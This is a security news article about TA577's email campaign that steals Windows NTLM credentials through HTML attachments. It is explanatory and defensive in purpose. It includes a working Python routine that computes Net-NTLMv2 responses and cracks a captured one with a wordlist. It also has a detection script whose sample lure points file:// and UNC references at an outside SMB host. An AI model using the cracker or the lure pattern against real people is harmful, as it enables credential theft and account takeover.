
Malicious email campaign steals NTLM hashes

A recent report from security firm Proofpoint has revealed that a threat group, identified as TA577 or Hive0118, is actively targeting organizations by sending rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information when opened. This group, known for being a financially motivated initial access broker, has been carrying out campaigns that have affected hundreds of entities with thousands of malicious email messages.

NTLM is a challenge-response authentication protocol that Windows still falls back to when a computer accesses network resources such as file shares over SMB. The password itself never crosses the wire: the server sends a challenge and the client answers with a keyed response (Net-NTLMv2 in current versions) derived from the user's NT password hash. An attacker who runs the server therefore chooses the challenge and captures the user name, domain and response, which can be cracked offline against a wordlist to recover the password or, in some configurations, relayed to another service that accepts NTLM authentication. What makes the technique effective is that Windows initiates this exchange automatically, with the logged-on user's credentials, as soon as it tries to reach an SMB server.
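To make concrete what "stealing NTLM hashes" means here, the following added example (written for this article, not Proofpoint's code or anything from the campaign) derives the NT hash and the Net-NTLMv2 proof as defined in MS-NLMP, simulates a rogue SMB server capturing a response, and then recovers the password with an offline dictionary attack. MD4 is implemented in pure Python because hashlib often lacks it on OpenSSL 3 builds; the user name, domain, password, wordlist and the simplified client blob are all constructed for the demonstration.

```python
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Used because hashlib.md4 is unavailable on many OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                # Each step updates one register, then the registers rotate (A,B,C,D) -> (D,A,B,C)
                a = _rotl((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This is the hash stored in the SAM / NTDS.dit."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(password: str, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """NtProofStr per MS-NLMP: HMAC-MD5 keyed by NTOWFv2 over ServerChallenge || client blob."""
    v2_key = hmac.new(nt_hash(password),
                      (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + client_blob, hashlib.md5).digest()


def simulate_capture(password: str, user: str, domain: str) -> dict:
    """Rogue SMB server side: it picks the 8-byte challenge, the victim answers with real credentials.
    The blob layout is simplified (version bytes, timestamp, client nonce); real blobs carry AV pairs."""
    server_challenge = os.urandom(8)
    client_blob = (b"\x01\x01" + b"\x00" * 6
                   + struct.pack("<Q", 133_000_000_000_000_000)   # constructed FILETIME
                   + os.urandom(8) + b"\x00" * 4)
    proof = ntlmv2_response(password, user, domain, server_challenge, client_blob)
    return {"user": user, "domain": domain, "challenge": server_challenge,
            "blob": client_blob, "proof": proof}


def crack_ntlmv2(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on a captured response; nothing here touches the network."""
    for candidate in wordlist:
        guess = ntlmv2_response(candidate, capture["user"], capture["domain"],
                                capture["challenge"], capture["blob"])
        if hmac.compare_digest(guess, capture["proof"]):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed victim and wordlist for the demonstration
    cap = simulate_capture("Spring2024!", "jdoe", "CORP")
    print("captured proof:", cap["proof"].hex())
    print("recovered:", crack_ntlmv2(cap, ["letmein", "Summer2023", "Spring2024!"]))
```

The point the code makes is that the captured material is not the NT hash itself but a keyed response over an attacker-chosen challenge, so its value depends on password strength: a short or dictionary password falls to exactly this loop, run at hashcat speeds rather than Python speeds.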

Proofpoint's researchers note that TA577 normally delivers malware, so a campaign built around stealing NTLM credentials is a departure for the group. This attack chain, first observed on 26 February, differs from the chains TA577 has previously used to distribute malware such as Pikabot.

In addition to distributing malware, TA577 is also involved in selling access to compromised systems to other cybercriminal groups. The compromised systems have often been subject to ransomware attacks, particularly with the Black Basta ransomware. One of the techniques used by TA577 is thread hijacking, where rogue email messages are crafted to appear as replies to legitimate emails sent earlier.

The recent campaigns used emails that appeared to be follow-ups to earlier messages, asking recipients to review a document sent previously. Each email carried a .zip archive together with the password needed to unpack it; the password protection also keeps the archive contents away from email scanners. Inside was an innocuous-looking HTML document personalized for each victim. When opened, it caused Windows to attempt an automatic connection to an SMB server controlled by the attackers, at which point the victim's machine offered up the logged-on user's NTLM credentials. HTML can trigger such a connection through a reference to a file:// URL or a \\host\share UNC path (in a meta refresh, an image source or a link, for example); the report summarised here does not say which construct this campaign used.
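A mail gateway or incident responder wants a cheap way to triage HTML attachments for this pattern. The following is an added example written for this article, not a Proofpoint tool or anything recovered from the campaign: it parses an HTML file with the standard library and reports every meta refresh, src, href, action or data reference that points at an SMB host outside the machine (file://host/share, the Windows file:////host/share form, or a raw UNC path), while ignoring ordinary web URLs and local file paths. The sample HTML and the 203.0.113.0/24 addresses are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from typing import List, Optional

_DRIVE = re.compile(r"^[A-Za-z]:$")
_REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\";\s]+)", re.I)


def remote_smb_host(url: str) -> Optional[str]:
    """Return the remote host an SMB-capable reference would contact, or None if the
    reference is a normal web URL or a local path. Handles file://host/share,
    file:////host/share (Windows UNC-in-URL form) and \\\\host\\share."""
    raw = url.strip()
    if raw.lower().startswith("file:"):
        rest = raw[5:].replace("\\", "/")
    elif raw.startswith("\\\\"):
        rest = raw.replace("\\", "/")
    else:
        return None
    # Count leading slashes: 2 -> host follows; 3 -> empty host (local path);
    # 4 or more -> Windows treats it as a UNC path; 0 or 1 -> local path.
    leading = len(rest) - len(rest.lstrip("/"))
    if leading not in (2,) and leading < 4:
        return None
    host = rest.lstrip("/").split("/", 1)[0].split("@")[-1]
    if not host or _DRIVE.match(host) or host.lower() == "localhost" or host.startswith("127."):
        return None
    return host


class AttachmentScanner(HTMLParser):
    """Collects attribute values that would make Windows open an SMB connection."""
    WATCHED = ("src", "href", "action", "data", "background")

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[dict] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = _REFRESH_URL.search(a.get("content", ""))
            if m:
                self._check(tag, "content", m.group(1))
        for name in self.WATCHED:
            if a.get(name):
                self._check(tag, name, a[name])

    def _check(self, tag: str, attr: str, value: str) -> None:
        host = remote_smb_host(value)
        if host:
            self.findings.append({"tag": tag, "attr": attr, "value": value.strip(), "host": host})


def scan_html(text: str) -> List[dict]:
    scanner = AttachmentScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed sample resembling a lure: one meta refresh and one image pointing at an
# external SMB host, plus a benign web image and a local file link that must not be flagged.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.5/docs/invoice.pdf">
</head><body>
<img src="https://cdn.example.com/logo.png">
<img src="\\\\203.0.113.5\\share\\pixel.gif">
<a href="file:///C:/Users/Public/readme.txt">local</a>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"SMB reference in <{f['tag']} {f['attr']}> -> {f['host']}: {f['value']}")
```

Treat a hit as a strong signal rather than proof: legitimate intranet pages do reference internal shares, so the useful rule for mail is "any file:// or UNC host that is not on the internal allow-list". The scanner deliberately ignores protocol-relative //host/path references, which browsers resolve over HTTP(S), not SMB.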

TA577 has a history of distributing various trojan programs and has been associated with malware such as IcedID, SystemBC, SmokeLoader, Ursnif, Cobalt Strike, and the more recent Pikabot. The threat group’s activities pose a significant risk to organizations, as the stolen NTLM credentials could be used in further malicious activities.

Organizations should treat this as both a people problem and a network problem. Security awareness training and email filtering help at the front end, but because the attack depends on the victim's workstation initiating an SMB connection to an internet host, the more durable controls are blocking outbound TCP port 445 at the perimeter and restricting outbound NTLM authentication to remote servers through Group Policy, alongside strong passwords that resist the offline cracking described above. Collaborating with cybersecurity experts and keeping up with current threat intelligence can also help in preventing and responding to breaches.
